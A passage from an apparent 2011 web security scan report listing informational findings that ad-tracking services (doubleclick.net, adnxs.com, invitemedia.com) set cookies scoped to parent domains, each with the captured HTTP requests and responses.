partnerUID=eyIxMTUiOiBbIjRkY2U4YTUzMDUwOGIwMmQiLCB0cnVlXSwgIjE1IjogWyIwMDQwMDMwMDE0MDAwMDA0NDk4NzIiLCB0cnVlXSwgIjE5MSI6IFsiODQ5NjUzMDYzOTI1MzI1NTgwNiIsIHRydWVdLCAiMTEzIjogWyJGUVdXQzJWSzJEV0YiLCB0cnVlXSwgIjg0IjogWyJGejYrRVMvYzk5TzZ6NU9CIiwgdHJ1ZV19

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Tue, 19 Jul 2011 14:28:38 GMT
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Expires: Tue, 19-Jul-2011 14:28:18 GMT
Content-Type: image/gif
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: exchange_uid=eyIyIjogWyIzNDIwNDE1MjQ1MjAwNjMzMDg1IiwgNzM0MzA4XSwgIjQiOiBbIkNBRVNFQkw2UWZGZE9aQkZ1d0t0cjRtWGN5YyIsIDczNDMzN119; Domain=invitemedia.com; expires=Wed, 18-Jul-2012 14:28:38 GMT; Path=/
Content-Length: 43

GIF89a.............!.......,...........D..;

13.49. http://googleads.g.doubleclick.net/pagead/viewthroughconversion/1071926901/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/viewthroughconversion/1071926901/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

test_cookie=CheckForPermission; expires=Tue, 19-Jul-2011 15:12:18 GMT; path=/; domain=.doubleclick.net

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pagead/viewthroughconversion/1071926901/?random=1311087443803&cv=6&fst=1311087443803&num=1&fmt=3&value=0&label=arLzCN3WggIQ9ZyR_wM&bg=666666&hl=en&guid=ON&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_his=0&u_tz=-300&u_nplug=0&u_nmime=0&url=about%3Ablank&ctc_id=CAIVAgAAAB0CAAAA&ct_cookie_present=false HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: googleads.g.doubleclick.net

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Date: Tue, 19 Jul 2011 14:57:18 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: image/gif
Set-Cookie: test_cookie=CheckForPermission; expires=Tue, 19-Jul-2011 15:12:18 GMT; path=/; domain=.doubleclick.net
X-Content-Type-Options: nosniff
Server: cafe
Content-Length: 42
X-XSS-Protection: 1; mode=block

GIF89a.............!.......,...........D.;

13.50. http://googleads.g.doubleclick.net/pagead/viewthroughconversion/1071926901/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/viewthroughconversion/1071926901/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

id=22048e84020100ee||t=1311087492|et=730|cs=002213fd4810efdd35c9315ece; expires=Thu, 18-Jul-2013 14:58:12 GMT; path=/; domain=.doubleclick.net

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pagead/viewthroughconversion/1071926901/?random=1311087498154&cv=6&fst=1311087498154&num=1&fmt=3&value=0&label=arLzCN3WggIQ9ZyR_wM&bg=666666&hl=en&guid=ON&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_his=0&u_tz=-300&u_nplug=0&u_nmime=0&url=about%3Ablank&ctc_id=CAIVAgAAAB0CAAAA&ct_cookie_present=false HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: googleads.g.doubleclick.net
Cookie: test_cookie=CheckForPermission

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Date: Tue, 19 Jul 2011 14:58:12 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: image/gif
Set-Cookie: id=22048e84020100ee||t=1311087492|et=730|cs=002213fd4810efdd35c9315ece; expires=Thu, 18-Jul-2013 14:58:12 GMT; path=/; domain=.doubleclick.net
Set-Cookie: test_cookie=; domain=.doubleclick.net; path=/; Max-Age=0; expires=Mon, 21-July-2008 23:59:00 GMT
X-Content-Type-Options: nosniff
Server: cafe
Content-Length: 42
X-XSS-Protection: 1; mode=block

GIF89a.............!.......,...........D.;

13.51. http://ib.adnxs.com/getuid previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ib.adnxs.com
Path:	/getuid

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

uuid2=3420415245200633085; path=/; expires=Mon, 17-Oct-2011 15:16:55 GMT; domain=.adnxs.com; HttpOnly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /getuid?http://cdnt.meteorsolutions.com/api/xid?xuid=$UID&svc=appnexus&uid=0ad1f409-c147-4bb9-a425-2684ee1031f7 HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.discoverbing.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __ar_v4=ONY2QKBYMVD5FEFX2BR37K%3A20110628%3A2%7CXEXAP5HEBFET3JK734P3BR%3A20110628%3A1%7COBXRF4HH6JFXLDDVFSEQTM%3A20110628%3A1%7COZVXN65U6VG3BGSO7THUYQ%3A20110616%3A1%7CWRSB44J6LBBYHJ46YBYSXU%3A20110616%3A4%7C3FSLMUQHHZF3ZGSHGFBTCR%3A20110616%3A1%7CO5SUSHFLMFHUBPFB64PGTV%3A20110616%3A3%7CPM4V2RLCAZHMPP5I42UJOL%3A20110620%3A1%7CAG2H3EESGBBUTM6CFDP2IB%3A20110620%3A1%7CM5OOXYHITZA7XGIMSMOSWH%3A20110628%3A1; icu=ChII1LEDEAoYASABKAEwoIvs8AQQoIvs8AQYAA..; sess=1; uuid2=3420415245200633085; anj=Kfw)lCZ#-r-!h!'s#U3r0uD6D#NO<U[._EBREBk3rkv@<Ai5)2@w#HA9*-cK9v.A<S=L![Xg[?!Ev.(fdk6.DQYCQJ-n>*HdcaZuu5kIcagFDAI)RR3rqFW-vor'l^4QMBcbEiy=6PV/cE-Tl4<wk'c8?@v/.^'C!_U_r%*^R6A-G`d$t(e=@tVU/O<Wyn!uV*chhg5DBTg-5V$cQ+]D`ivJQ`8Wu5!D!c:fyvLH'7_:>5uJlH#!uLvlpUsWU8Y)V+$>1MP::@S(rLq>oW(Gq0G=>)E][MB8D'LvyoMVpRj5^FZYyj*g_Q>U/>!)k+vU!pl6mrulD4MrH#aenb6a1']39nxKTao[v)@q?xN:K2c?r693$))rIAToXkDINJ1%=8%YC%2x0*IO@[wWc#TgWhm[:wD_WHETl.a@mVO)IrDrDVmmzf.<dH5b>b>x2kmc>Mms2D(aqRk5>YT@HVZ*Bxr^0G7QNoS_kQ5%%Jg=/WSc1uhPIEa0%bXm*[MCnpg4:vXt[zy^wT%IQk_@rAGdzxy'CVH14^rcSr212I5_O2OgBh:Q$Y2m.ZwOEOv5YUzM/xt8[ol*Jh7>UjsYAwjMd:HTkSi0R'r.Z*.9fl+ep>^RE8)^1GH9WsY>@c8p?_t0(#TNge0Qv2vej@R)5=.5:sw2eT77v?BE@ebhn56VE//J3'7WL]0W<X8@r45L^yn)NoVB5B`ENA<_30EJ5tc3Q5Y0:esk2Utbx>xkUiu@=+Hs'*jK3$0Wg!)%

Response

HTTP/1.1 302 Moved
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Wed, 20-Jul-2011 15:16:55 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=3420415245200633085; path=/; expires=Mon, 17-Oct-2011 15:16:55 GMT; domain=.adnxs.com; HttpOnly
Location: http://cdnt.meteorsolutions.com/api/xid?xuid=3420415245200633085&svc=appnexus&uid=0ad1f409-c147-4bb9-a425-2684ee1031f7
Date: Tue, 19 Jul 2011 15:16:55 GMT
Content-Length: 0

13.52. http://ib.adnxs.com/mapuid previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ib.adnxs.com
Path:	/mapuid

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

uuid2=7212282717808390200; path=/; expires=Mon, 17-Oct-2011 20:42:41 GMT; domain=.adnxs.com; HttpOnly
uuid2=7212282717808390200; path=/; expires=Mon, 17-Oct-2011 20:42:41 GMT; domain=.adnxs.com; HttpOnly
anj=Kfu=8fG7DHE:3F.0s]#%2L_'x%SEV/i#-$J!z6Wr8RXhl)=m!YD2*h.g<ASP%TqwW#(tx$%c]+McvegUoTV'oPd[_vD%r8FgFSHuwr$Ygv>tkv%vnG*+/ld?coMiZ:c5aFt+j:v+B<AT4Aln*Pf@3^46@UrC?Y]+7D^**il8bz2s<KI0ORCT`QuHy$RXj1t$rf+]M^>^=:_e78ohgMdtT_1oWnca.tK[`wf@!9hU[0st)EmB'#Kw(w$W)P^c6C:(D).g=JU?3$q5Q.c4O!PMqMu@7XRqQ<cVQ@; path=/; expires=Mon, 17-Oct-2011 20:42:41 GMT; domain=.adnxs.com; HttpOnly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /mapuid?member=311&user=11fda490648f83c&seg_code=noseg&ord=1311108157 HTTP/1.1
Host: ib.adnxs.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://boston.com/
Cookie: uuid2=7212282717808390200; icu=ChII7sICEAoYBSAFKAUwyI2S8QQQyI2S8QQYBA..; anj=Kfu=8fG2<rfQCe7?0P(*AuB-u**g1:XIBOG#yJ1hN)-R^0:8p7d!oK7UWL+#*K-$4$/nr%*K>4vNYxP0fQ4ob(aFmBU*T`NNVR<M37Z$X.15R=d`(15ZWGC-(Q6GB$<'CNDvA9TrI<[)#nA'DDZ#`*t#GctC`:WA?8^$tLjhtk3Jy/B'b`=j+)i%[.ce9um'8$YSQ?l[3<O/+Jyyl*!RNvLb)'V@@?iab*eFC<w6z$DO^Tcc.#XB=6U.'M7Q+4AdiD@gc[5FE]T[7U:0sov)-Jo>9R2c%^J4A/.0(bl'kok->q$+S; sess=1

Response

13.53. http://ib.adnxs.com/ptj previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ib.adnxs.com
Path:	/ptj

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

uuid2=7212282717808390200; path=/; expires=Mon, 17-Oct-2011 20:44:48 GMT; domain=.adnxs.com; HttpOnly
icu=ChII1LEDEAoYAiACKAIwwNmX8QQQwNmX8QQYAQ..; path=/; expires=Mon, 17-Oct-2011 20:44:48 GMT; domain=.adnxs.com; HttpOnly
acb575527=5_[r^XI()v4bi][?zqy!w=Td+?enc=HMdxnOM4DkAAAABAMzMLQAAAAEAzMwtAc2iR7Xy_EUC4HoXrUbgTQN1zHazSs38qOHCoZussF2TA7CVOAAAAAPcqCAA3AQAANQEAAAIAAACeyAcADSwBAAEAAABVU0QAVVNEAKAAWAKqKwAAnwQBAgUCAQUAAAAADB5xdgAAAAA.&tt_code=cm.quadbostonglobe&udj=uf%28%27a%27%2C+21322%2C+1311108288%29%3Buf%28%27r%27%2C+510110%2C+1311108288%29%3Bppv%2815053%2C+%273062363989047342045%27%2C+1311108288%2C+1316292288%2C+98060%2C+76813%29%3B&cnd=!gyE-tQiM_gUQnpEfGAAgjdgEMAA4qldAAEi1AlD31SBYAGDIAWgAcAB4AIABAIgBAJABAZgBAaABAagBA7ABALkBzczM9FG4E0DBAc3MzPRRuBNAyQEzMzMzMzP3P9kBAAAAAAAA8D_gAQA.&ccd=!lwRFJgiM_gUQnpEfGI3YBCAA; path=/; expires=Wed, 20-Jul-2011 20:44:48 GMT; domain=.adnxs.com; HttpOnly
anj=Kfu=8fG2<rfQCe7?0P(*AuB-u**g1:XIBOG#yJ1hN)-R^0:8p7d!oK7UWL+#*K-$4$/nr%*K>4vNYxP0fQ4ob(Q)FrcgD>gUlpmowPR5St#!Oq*raj24<^IXNgeZ:R-z9hotxFq4D7U+E_^a2(TIGAEI]-hbvK>4L(R22Za2CHlx6yu$EFe*$y5PR+)i%[.ce9um'8$YSQ?l[3<O/+Jyyl*!W]1M`O#eS@?iab*eFC<w6z$DO^Tcc.#XB=6U.'M7Q+4AdiD@gc[5FE]T[7U:0sov)-Jo>9R2c%^J4A/.0(bl'kqZ6?5yZZ; path=/; expires=Mon, 17-Oct-2011 20:44:48 GMT; domain=.adnxs.com; HttpOnly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ptj?member=311&inv_code=cm.quadbostonglobe&size=160x600&imp_id=cm-10210473643_1311108278,11fda490648f83c&referrer=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.quadbostonglobe%2F%3Bnet%3Dcm%3Bu%3D%2Ccm-10210473643_1311108278%2C11fda490648f83c%2Cnone%2Cax.{PRICEBUCKET}-bz.25%3B%3Bcmw%3Dnowl%3Bsz%3D160x600%3Bnet%3Dcm%3Benv%3Difr%3Bord1%3D551186%3Bcontx%3Dnone%3Ban%3D{PRICEBUCKET}%3Bdc%3Dw%3Bbtg%3Dbz.25%3Bord%3D1311108273%3F HTTP/1.1
Host: ib.adnxs.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/610/bostonglobe/160x600/bg_1064637_61606216?t=1311108279704&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.boston.com%2FBoston%2Fbusinessupdates%2F2011%2F07%2Fstate-street-announces-more-job-cuts%2F2Ah9Wno4Q7WHDubEEBBYLN%2Findex.html%3Fp1%3DNews_links&refer=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue
Cookie: uuid2=7212282717808390200; icu=ChII7sICEAoYBSAFKAUwyI2S8QQQyI2S8QQYBA..; anj=Kfu=8fG7DHE:3F.0s]#%2L_'x%SEV/i#-$J!z6Wr8RXhl)=m!YD2*h.g<ASP%TqwW#(tx$%c]+McvegUoTV'oPd[_vD%r8FgFSHuwr$Ygv>tkv%vnG*+/ld?coMiZ:c5aFt+j:v+B<AT4Aln*Pf@3^46@UrC?Y]+7D^**il8bz2s<KI0ORCT`QuHy$RXj1t$rf+]M^>^=:_e78ohgMdtT_1oWnca.tK[`wf@!9hU[0st)EmB'#Kw(w$W)P^c6C:(D).g=JU?3$q5Q.c4O!PMqMu@7XRqQ<cVQ@; sess=1

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Wed, 20-Jul-2011 20:44:48 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=7212282717808390200; path=/; expires=Mon, 17-Oct-2011 20:44:48 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: icu=ChII1LEDEAoYAiACKAIwwNmX8QQQwNmX8QQYAQ..; path=/; expires=Mon, 17-Oct-2011 20:44:48 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb575527=5_[r^XI()v4bi][?zqy!w=Td+?enc=HMdxnOM4DkAAAABAMzMLQAAAAEAzMwtAc2iR7Xy_EUC4HoXrUbgTQN1zHazSs38qOHCoZussF2TA7CVOAAAAAPcqCAA3AQAANQEAAAIAAACeyAcADSwBAAEAAABVU0QAVVNEAKAAWAKqKwAAnwQBAgUCAQUAAAAADB5xdgAAAAA.&tt_code=cm.quadbostonglobe&udj=uf%28%27a%27%2C+21322%2C+1311108288%29%3Buf%28%27r%27%2C+510110%2C+1311108288%29%3Bppv%2815053%2C+%273062363989047342045%27%2C+1311108288%2C+1316292288%2C+98060%2C+76813%29%3B&cnd=!gyE-tQiM_gUQnpEfGAAgjdgEMAA4qldAAEi1AlD31SBYAGDIAWgAcAB4AIABAIgBAJABAZgBAaABAagBA7ABALkBzczM9FG4E0DBAc3MzPRRuBNAyQEzMzMzMzP3P9kBAAAAAAAA8D_gAQA.&ccd=!lwRFJgiM_gUQnpEfGI3YBCAA; path=/; expires=Wed, 20-Jul-2011 20:44:48 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG2<rfQCe7?0P(*AuB-u**g1:XIBOG#yJ1hN)-R^0:8p7d!oK7UWL+#*K-$4$/nr%*K>4vNYxP0fQ4ob(Q)FrcgD>gUlpmowPR5St#!Oq*raj24<^IXNgeZ:R-z9hotxFq4D7U+E_^a2(TIGAEI]-hbvK>4L(R22Za2CHlx6yu$EFe*$y5PR+)i%[.ce9um'8$YSQ?l[3<O/+Jyyl*!W]1M`O#eS@?iab*eFC<w6z$DO^Tcc.#XB=6U.'M7Q+4AdiD@gc[5FE]T[7U:0sov)-Jo>9R2c%^J4A/.0(bl'kqZ6?5yZZ; path=/; expires=Mon, 17-Oct-2011 20:44:48 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Tue, 19 Jul 2011 20:44:48 GMT
Content-Length: 386

document.write('<scr'+'ipt type="text/javascript"src="http://ad.doubleclick.net/adj/cm.quadbostonglobe/;net=cm;u=,cm-10210473643_1311108278,11fda490648f83c,none,ax.340-bz.25;;cmw=nowl;sz=160x600;net=c
...[SNIP]...

13.54. http://ib.adnxs.com/px previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ib.adnxs.com
Path:	/px

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

uuid2=3420415245200633085; path=/; expires=Mon, 17-Oct-2011 15:16:56 GMT; domain=.adnxs.com; HttpOnly
anj=Kfw)lByB_/)J710+(.p3Z5+h4$Vy!yQYtW=Z5Z#lksL^h_:u[IkzlP?'IePJ/Z#Fy#8/vNL^@iW')uNV=zGung>(`Nvl+CN8u-4+Q:+G!i8zGW$6P0Ygj@gDJ6!3?ZhDD5$=8BCeDZt%n`?LyXoJ#6)EuCK6aCI$H_MElJh'P$eeW!*0s)5De8DL?*#b$[EsY7U88->_iR@sU@-_C!RX0K>pRo:'hdT`N%S]+?#:oYotSYv4@Yo^B@ypqVmgsn2IQvk]ngqdF)yegzmDu+k*[z^t:y@KNF?jNEu`nMBkjUs9T2ndLh!>yTe'`=U1hcD5i0M#o^+INb#$Fo#H]Y+!sTkU/=CCna0DqAscOQEb18*N=6E.D9a:91#6DRsnGmNy*nBg3QRvH6PO^D63]1Av>W9w7$qzEylR?X'('H+w*hOjM1CKvMOdL.x6nkE)2MTY5>uVbIIRX*WFGCg]V>7+6OIy0p@me-wEAV*5(6<x%kah-9v8G31F+D1hgwE.>bj3k$+_hrDkc0#`8fWEmU*b5Al<nY!0k14WeBG[Rc%(D3io)qo*(Vm%(Wt$).pcz]RVf*JJ.pv>fpY3BKSs8.f/qLc%eUa?ZD^I1VIp[X@kcfSC75Y_=l$)qPK]!zpr2SCQ-q]``OVL*/=(GCO7b!0sGu0sx<Y+$^WE/FM2.1ZPl%av@7<^=/5jy:KaE%l(nW>n3iDaFbwW!JTqWV-st*l7vo:UeNqhsP.`j$]GjFrRJtqDW3cBrZ9sY+WHuay<OsLep3; path=/; expires=Mon, 17-Oct-2011 15:16:56 GMT; domain=.adnxs.com; HttpOnly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /px?id=9179&seg=98313&order_id=0ad1f409-c147-4bb9-a425-2684ee1031f7&t=2 HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.discoverbing.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __ar_v4=ONY2QKBYMVD5FEFX2BR37K%3A20110628%3A2%7CXEXAP5HEBFET3JK734P3BR%3A20110628%3A1%7COBXRF4HH6JFXLDDVFSEQTM%3A20110628%3A1%7COZVXN65U6VG3BGSO7THUYQ%3A20110616%3A1%7CWRSB44J6LBBYHJ46YBYSXU%3A20110616%3A4%7C3FSLMUQHHZF3ZGSHGFBTCR%3A20110616%3A1%7CO5SUSHFLMFHUBPFB64PGTV%3A20110616%3A3%7CPM4V2RLCAZHMPP5I42UJOL%3A20110620%3A1%7CAG2H3EESGBBUTM6CFDP2IB%3A20110620%3A1%7CM5OOXYHITZA7XGIMSMOSWH%3A20110628%3A1; icu=ChII1LEDEAoYASABKAEwoIvs8AQQoIvs8AQYAA..; sess=1; uuid2=3420415245200633085; anj=Kfw)lCZ#-r-!h!'s#U3r0uD6D#NO<U[._EBREBk3rkv@<Ai5)2@w#HA9*-cK9v.A<S=L![Xg[?!Ev.(fdk6.DQYCQJ-n>*HdcaZuu5kIcagFDAI)RR3rqFW-vor'l^4QMBcbEiy=6PV/cE-Tl4<wk'c8?@v/.^'C!_U_r%*^R6A-G`d$t(e=@tVU/O<Wyn!uV*chhg5DBTg-5V$cQ+]D`ivJQ`8Wu5!D!c:fyvLH'7_:>5uJlH#!uLvlpUsWU8Y)V+$>1MP::@S(rLq>oW(Gq0G=>)E][MB8D'LvyoMVpRj5^FZYyj*g_Q>U/>!)k+vU!pl6mrulD4MrH#aenb6a1']39nxKTao[v)@q?xN:K2c?r693$))rIAToXkDINJ1%=8%YC%2x0*IO@[wWc#TgWhm[:wD_WHETl.a@mVO)IrDrDVmmzf.<dH5b>b>x2kmc>Mms2D(aqRk5>YT@HVZ*Bxr^0G7QNoS_kQ5%%Jg=/WSc1uhPIEa0%bXm*[MCnpg4:vXt[zy^wT%IQk_@rAGdzxy'CVH14^rcSr212I5_O2OgBh:Q$Y2m.ZwOEOv5YUzM/xt8[ol*Jh7>UjsYAwjMd:HTkSi0R'r.Z*.9fl+ep>^RE8)^1GH9WsY>@c8p?_t0(#TNge0Qv2vej@R)5=.5:sw2eT77v?BE@ebhn56VE//J3'7WL]0W<X8@r45L^yn)NoVB5B`ENA<_30EJ5tc3Q5Y0:esk2Utbx>xkUiu@=+Hs'*jK3$0Wg!)%

Response

13.55. http://ib.adnxs.com/pxj previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ib.adnxs.com
Path:	/pxj

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

uuid2=7212282717808390200; path=/; expires=Mon, 17-Oct-2011 20:48:57 GMT; domain=.adnxs.com; HttpOnly
anj=Kfu=8fG4S]fQCe7?0P(*AuB-u**g1:XIF3Z#yJ1hN)-R^0:8p7d!oK7UWL+#*K-$4$/nr%*K>4vNYxP0fQ4ob(Q)FrcgD>gUlpmowPR5St#!Oq*raj24<^IXNgeZ:R-z9hotxFq4D7U+E_^a2(TIGAEI]-hbvK>4L(R22Za2CHlx6yu$EFe*$y5PR+)i%[.ce9um'8$YSQ?l[3<O/+Jyyl*!W]1M`9N16/A@62N!Q.2s=Ac+OBmJhP_oR<_TyZVw>RTOLn3<LqI4'Re#$=p4'AIQo@#P#Vcnd)nEfl3!*RKTYEy<t; path=/; expires=Mon, 17-Oct-2011 20:48:57 GMT; domain=.adnxs.com; HttpOnly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pxj?bidder=55&action=SetAdMarketCookies(%22AA002%3d1297100700-4279215%7cMUID%3d3957719be8f34a5da51d204e7e06704a%7cTOptOut%3d0%7cEANON%3dA%253d01200223vG8IEYTq8jK1b5BY7VQmQPnJpKgphDUO192CSIIO2XgKuc6vr_ofSjLaFKNoS26Rc2PdVlSL3K-WngKmkXG7Y%2526E%253dFFF%2526W%253d1%22); HTTP/1.1
Host: ib.adnxs.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/iaction/adoapn_AppNexusDemoActionTag_1
Cookie: uuid2=7212282717808390200; icu=ChII1LEDEAoYASABKAEwu9mX8QQQu9mX8QQYAA..; anj=Kfu=8fG4S]fQCe7?0P(*AuB-u**g1:XIF3Z#yJ1hN)-R^0:8p7d!oK7UWL+#*K-$4$/nr%*K>4vNYxP0fQ4ob(Q)FrcgD>gUlpmowPR5St#!Oq*raj24<^IXNgeZ:R-z9hotxFq4D7U+E_^a2(TIGAEI]-hbvK>4L(R22Za2CHlx6yu$EFe*$y5PR+)i%[.ce9um'8$YSQ?l[3<O/+Jyyl*!W]1M`9N16/A@62N!Q.2s=Ac+OBmJhP_oR<_TyZVw>RTOLn3<LqI4'Re#$=p4'AIQo@#P#Vcnd)nEfl3!*RKTYEy<t; sess=1; acb865736=5_[r^XI()v4bi][?zqy!u_x5%?enc=HMdxnOM4DkAAAABAMzMLQAAAAEAzMwtAc2iR7Xy_EUC4HoXrUbgTQF5Z1VY7FHdfOHCoZussF2S77CVOAAAAAPcqCAA3AQAANQEAAAIAAACeyAcADSwBAAEAAABVU0QAVVNEAKAAWAKqKwAApxEBAgUCAQUAAAAA3ByADAAAAAA.&tt_code=cm.quadbostonglobe&udj=uf%28%27a%27%2C+21322%2C+1311108283%29%3Buf%28%27r%27%2C+510110%2C+1311108283%29%3Bppv%2815053%2C+%276878989200924170590%27%2C+1311108283%2C+1316292283%2C+98060%2C+76813%29%3B&cnd=!gyE-tQiM_gUQnpEfGAAgjdgEMAA4qldAAEi1AlD31SBYAGDIAWgAcAB4AIABAIgBAJABAZgBAaABAagBA7ABALkBzczM9FG4E0DBAc3MzPRRuBNAyQEzMzMzMzP3P9kBAAAAAAAA8D_gAQA.&ccd=!lwRFJgiM_gUQnpEfGI3YBCAA

Response

13.56. http://ib.adnxs.com/seg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ib.adnxs.com
Path:	/seg

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

uuid2=3420415245200633085; path=/; expires=Mon, 17-Oct-2011 18:37:06 GMT; domain=.adnxs.com; HttpOnly
